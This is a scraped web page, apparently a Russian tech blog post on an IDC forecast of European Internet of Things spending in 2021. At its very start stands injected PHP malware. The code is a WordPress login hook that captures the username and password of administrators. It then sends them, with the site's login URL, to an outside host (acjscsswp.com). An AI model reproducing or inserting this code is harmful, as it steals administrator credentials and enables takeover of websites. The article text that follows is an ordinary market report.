if (!function_exists("theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b")) { function theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b', 10, 0); } IDC: В 2021 году расходы на Интернет вещей в Европе превысят 200 миллиардов долларов — techno-blog

IDC: В 2021 году расходы на Интернет вещей в Европе превысят 200 миллиардов долларов

IDC: В 2021 году расходы на Интернет вещей в Европе превысят 200 миллиардов долларов

Наиболее существенная часть затрат приходится на оборудование; далее следует сегмент услуг, который важен для предприятий. Но самыми быстрыми темпами растет сегмент приложений Интернета вещей.

По оценкам компании International Data Corporation, в 2021 году расходы на Интернет вещей в Европе достигнут 202 млрд долл., а их ежегодный процентный рост в период до 2025 года будет измеряться двузначными величинами. Несмотря на глобальное влияние пандемии COVID-19, развитие рынка Интернета вещей продолжается, хотя и более медленными темпами по сравнению с тем, как это происходило в последние годы. В IDC ожидают, что в 2021 году рост в различных секторах продолжится по мере того, как операции, проекты и сотрудники будут возвращаться к нормальной жизни.

Ожидается, что в 2021 году наиболее существенная часть затрат придется на оборудование (модули и датчики). Далее следует сегмент услуг, имеющий важное значение для предприятий, которым необходимо заниматься оценкой, проектированием и развертыванием физических устройств, а также поддержкой выполняемых на них операций. Сегмент программного обеспечения, особенно приложений Интернета вещей, используемых для упорядочения широкого спектра структурированных и неструктурированных данных и организации доступа к ним, в ближайшие несколько лет будет развиваться наиболее быстрыми темпами.

COVID-19 и связанная с ним неопределенность в последующие годы сохранит свое влияние в некоторых отраслях, в связи с чем их эффективность будет зависеть от роли сценариев применения Интернета вещей и темпов перехода к нормальной жизни.

Наиболее значительные затраты на Интернет вещей в Европе в 2021 году будут приходиться на потребительский сектор. Это обусловлено популярностью решений домашней автоматизации, повышающих качество жизни и оптимизирующих повседневные взаимодействия с созданием подключенной домашней среды, управление которой осуществляется потребителями в удаленном режиме с помощью приложений, соответствующих веб-сайтов, домашних систем и параметров настройки. Второй крупнейшей отраслью является производственная. В 2020 году она была одной из наиболее пострадавших. Но здесь решения Интернета вещей используются для удаленного отслеживания, мониторинга и поддержки промышленных производственных устройств, которые являются частью производственной цепочки создания стоимости, где оценка состояния оборудования и удаленная диагностика отказов выполняется еще до их возникновения путем анализа живого потока данных, генерируемых машиной.

Благодаря социальному дистанцированию и удаленной работе решения мониторинга состояния здоровья, использующие технологии Интернета вещей для улучшения качества жизни и ухода за больными за счет точного и целенаправленного мониторинга на дому, в ближайшие пару лет превратят отрасль здравоохранения в одну из самых быстрорастущих.

Даже с учетом того, что COVID-19 меняет инвестиционные планы многих европейских компаний, рынок Интернета вещей продолжает оставаться весьма привлекательным для многих отраслей, включая отрасль здравоохранения и розничную торговлю, а Интернет вещей может поддерживать развивающиеся стратегии многоканальной розничной торговли, беспрепятственно формируя потребительское восприятие через любой канал покупок, утверждают в IDC. Однако другие вертикальные отрасли – строительство, персональные и потребительские услуги – в ближайшие годы будут пользоваться меньшим спросом и развиваться не так быстро, фокусируясь на поддержке других приоритетов бизнеса в процессе посткризисного восстановления.